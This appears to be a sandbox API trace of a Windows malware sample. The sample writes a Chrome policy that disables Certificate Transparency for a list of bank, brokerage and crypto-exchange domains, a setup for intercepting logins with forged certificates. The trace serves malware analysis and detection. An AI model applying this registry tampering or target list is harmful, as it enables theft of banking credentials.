	[0191.556] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118cdd8 | out: hHeap=0x260000) returned 1
	[0191.557] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x344) returned 0x0
	[0191.557] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x34c, lpdwDisposition=0x0) returned 0x0
	[0191.557] RegSetValueExA (in: hKey=0x34c, lpValueName="55", Reserved=0x0, dwType=0x1, lpData="businessaccess.citibank.citigroup.com", cbData=0x25 | out: lpData="businessaccess.citibank.citigroup.com") returned 0x0
	[0191.558] RegCloseKey (hKey=0x34c) returned 0x0
	[0191.558] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.558] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.558] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.558] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.558] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.558] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x348) returned 0x0
	[0191.558] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x350, lpdwDisposition=0x0) returned 0x0
	[0191.558] RegSetValueExA (in: hKey=0x350, lpValueName="56", Reserved=0x0, dwType=0x1, lpData="accountonline.citi.com", cbData=0x16 | out: lpData="accountonline.citi.com") returned 0x0
	[0191.559] RegCloseKey (hKey=0x350) returned 0x0
	[0191.559] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.559] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.559] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.559] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.559] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.559] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x34c) returned 0x0
	[0191.559] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x354, lpdwDisposition=0x0) returned 0x0
	[0191.559] RegSetValueExA (in: hKey=0x354, lpValueName="57", Reserved=0x0, dwType=0x1, lpData="www.citi.com", cbData=0xc | out: lpData="www.citi.com") returned 0x0
	[0191.560] RegCloseKey (hKey=0x354) returned 0x0
	[0191.560] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x350) returned 0x0
	[0191.560] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x358, lpdwDisposition=0x0) returned 0x0
	[0191.560] RegSetValueExA (in: hKey=0x358, lpValueName="58", Reserved=0x0, dwType=0x1, lpData="citi.com", cbData=0x8 | out: lpData="citi.com") returned 0x0
	[0191.561] RegCloseKey (hKey=0x358) returned 0x0
	[0191.561] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.561] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.561] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.561] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.561] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.561] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x354) returned 0x0
	[0191.561] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x35c, lpdwDisposition=0x0) returned 0x0
	[0191.561] RegSetValueExA (in: hKey=0x35c, lpValueName="59", Reserved=0x0, dwType=0x1, lpData="securentrycorp.zionsbank.com", cbData=0x1c | out: lpData="securentrycorp.zionsbank.com") returned 0x0
	[0191.562] RegCloseKey (hKey=0x35c) returned 0x0
	[0191.562] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.562] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.562] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.562] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.562] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.562] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x358) returned 0x0
	[0191.563] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x360, lpdwDisposition=0x0) returned 0x0
	[0191.563] RegSetValueExA (in: hKey=0x360, lpValueName="60", Reserved=0x0, dwType=0x1, lpData="www.lexisnexis.com", cbData=0x12 | out: lpData="www.lexisnexis.com") returned 0x0
	[0191.563] RegCloseKey (hKey=0x360) returned 0x0
	[0191.564] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x35c) returned 0x0
	[0191.564] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x364, lpdwDisposition=0x0) returned 0x0
	[0191.564] RegSetValueExA (in: hKey=0x364, lpValueName="61", Reserved=0x0, dwType=0x1, lpData="lexisnexis.com", cbData=0xe | out: lpData="lexisnexis.com") returned 0x0
	[0191.565] RegCloseKey (hKey=0x364) returned 0x0
	[0191.565] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.565] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.565] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.565] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.565] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.565] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x360) returned 0x0
	[0191.565] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x368, lpdwDisposition=0x0) returned 0x0
	[0191.565] RegSetValueExA (in: hKey=0x368, lpValueName="62", Reserved=0x0, dwType=0x1, lpData="www", cbData=0x3 | out: lpData="www") returned 0x0
	[0191.566] RegCloseKey (hKey=0x368) returned 0x0
	[0191.566] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.566] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.566] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.566] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.566] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.566] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x364) returned 0x0
	[0191.566] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x36c, lpdwDisposition=0x0) returned 0x0
	[0191.566] RegSetValueExA (in: hKey=0x36c, lpValueName="63", Reserved=0x0, dwType=0x1, lpData="securentrycorp.calbanktrust.com", cbData=0x1f | out: lpData="securentrycorp.calbanktrust.com") returned 0x0
	[0191.567] RegCloseKey (hKey=0x36c) returned 0x0
	[0191.567] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.567] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.567] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.567] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.567] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.567] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x368) returned 0x0
	[0191.567] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x370, lpdwDisposition=0x0) returned 0x0
	[0191.567] RegSetValueExA (in: hKey=0x370, lpValueName="64", Reserved=0x0, dwType=0x1, lpData="fireline.firelandsfcu.org", cbData=0x19 | out: lpData="fireline.firelandsfcu.org") returned 0x0
	[0191.568] RegCloseKey (hKey=0x370) returned 0x0
	[0191.568] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.568] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.568] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.568] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.568] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.568] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x36c) returned 0x0
	[0191.568] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x374, lpdwDisposition=0x0) returned 0x0
	[0191.569] RegSetValueExA (in: hKey=0x374, lpValueName="65", Reserved=0x0, dwType=0x1, lpData="www.binance.com", cbData=0xf | out: lpData="www.binance.com") returned 0x0
	[0191.569] RegCloseKey (hKey=0x374) returned 0x0
	[0191.569] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x370) returned 0x0
	[0191.570] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x378, lpdwDisposition=0x0) returned 0x0
	[0191.570] RegSetValueExA (in: hKey=0x378, lpValueName="66", Reserved=0x0, dwType=0x1, lpData="binance.com", cbData=0xb | out: lpData="binance.com") returned 0x0
	[0191.570] RegCloseKey (hKey=0x378) returned 0x0
	[0191.571] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.571] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.571] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.571] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.571] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.571] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x374) returned 0x0
	[0191.571] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x37c, lpdwDisposition=0x0) returned 0x0
	[0191.571] RegSetValueExA (in: hKey=0x37c, lpValueName="67", Reserved=0x0, dwType=0x1, lpData="onlinebanking.usbank.com", cbData=0x18 | out: lpData="onlinebanking.usbank.com") returned 0x0
	[0191.572] RegCloseKey (hKey=0x37c) returned 0x0
	[0191.572] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.572] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.572] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.572] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.572] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.572] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x378) returned 0x0
	[0191.572] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x380, lpdwDisposition=0x0) returned 0x0
	[0191.572] RegSetValueExA (in: hKey=0x380, lpValueName="68", Reserved=0x0, dwType=0x1, lpData="singlepoint.usbank.com", cbData=0x16 | out: lpData="singlepoint.usbank.com") returned 0x0
	[0191.573] RegCloseKey (hKey=0x380) returned 0x0
	[0191.573] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.573] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.573] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.573] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.573] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.573] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x37c) returned 0x0
	[0191.573] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x384, lpdwDisposition=0x0) returned 0x0
	[0191.573] RegSetValueExA (in: hKey=0x384, lpValueName="69", Reserved=0x0, dwType=0x1, lpData="banking.firsttechfed.com", cbData=0x18 | out: lpData="banking.firsttechfed.com") returned 0x0
	[0191.574] RegCloseKey (hKey=0x384) returned 0x0
	[0191.574] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.574] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.574] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.574] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.574] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.574] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x380) returned 0x0
	[0191.574] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x388, lpdwDisposition=0x0) returned 0x0
	[0191.574] RegSetValueExA (in: hKey=0x388, lpValueName="70", Reserved=0x0, dwType=0x1, lpData="access.jpmorgan.com", cbData=0x13 | out: lpData="access.jpmorgan.com") returned 0x0
	[0191.575] RegCloseKey (hKey=0x388) returned 0x0
	[0191.575] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.575] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.576] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.576] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.576] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.576] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x384) returned 0x0
	[0191.576] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x38c, lpdwDisposition=0x0) returned 0x0
	[0191.576] RegSetValueExA (in: hKey=0x38c, lpValueName="71", Reserved=0x0, dwType=0x1, lpData="vesidm.verizonwireless.com", cbData=0x1a | out: lpData="vesidm.verizonwireless.com") returned 0x0
	[0191.577] RegCloseKey (hKey=0x38c) returned 0x0
	[0191.577] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.577] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.577] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.577] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.577] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.577] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x388) returned 0x0
	[0191.577] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x390, lpdwDisposition=0x0) returned 0x0
	[0191.577] RegSetValueExA (in: hKey=0x390, lpValueName="72", Reserved=0x0, dwType=0x1, lpData="olb.bbvacompass.com", cbData=0x13 | out: lpData="olb.bbvacompass.com") returned 0x0
	[0191.578] RegCloseKey (hKey=0x390) returned 0x0
	[0191.578] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.578] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.578] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.578] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.578] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.578] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x38c) returned 0x0
	[0191.578] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x394, lpdwDisposition=0x0) returned 0x0
	[0191.578] RegSetValueExA (in: hKey=0x394, lpValueName="73", Reserved=0x0, dwType=0x1, lpData="www.bbvacompass.com", cbData=0x13 | out: lpData="www.bbvacompass.com") returned 0x0
	[0191.579] RegCloseKey (hKey=0x394) returned 0x0
	[0191.579] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x390) returned 0x0
	[0191.579] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x398, lpdwDisposition=0x0) returned 0x0
	[0191.580] RegSetValueExA (in: hKey=0x398, lpValueName="74", Reserved=0x0, dwType=0x1, lpData="bbvacompass.com", cbData=0xf | out: lpData="bbvacompass.com") returned 0x0
	[0191.580] RegCloseKey (hKey=0x398) returned 0x0
	[0191.581] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.581] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.581] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.581] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.581] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.581] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x394) returned 0x0
	[0191.581] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x39c, lpdwDisposition=0x0) returned 0x0
	[0191.581] RegSetValueExA (in: hKey=0x39c, lpValueName="75", Reserved=0x0, dwType=0x1, lpData="www.usaa.com", cbData=0xc | out: lpData="www.usaa.com") returned 0x0
	[0191.582] RegCloseKey (hKey=0x39c) returned 0x0
	[0191.582] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x398) returned 0x0
	[0191.582] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3a0, lpdwDisposition=0x0) returned 0x0
	[0191.582] RegSetValueExA (in: hKey=0x3a0, lpValueName="76", Reserved=0x0, dwType=0x1, lpData="usaa.com", cbData=0x8 | out: lpData="usaa.com") returned 0x0
	[0191.583] RegCloseKey (hKey=0x3a0) returned 0x0
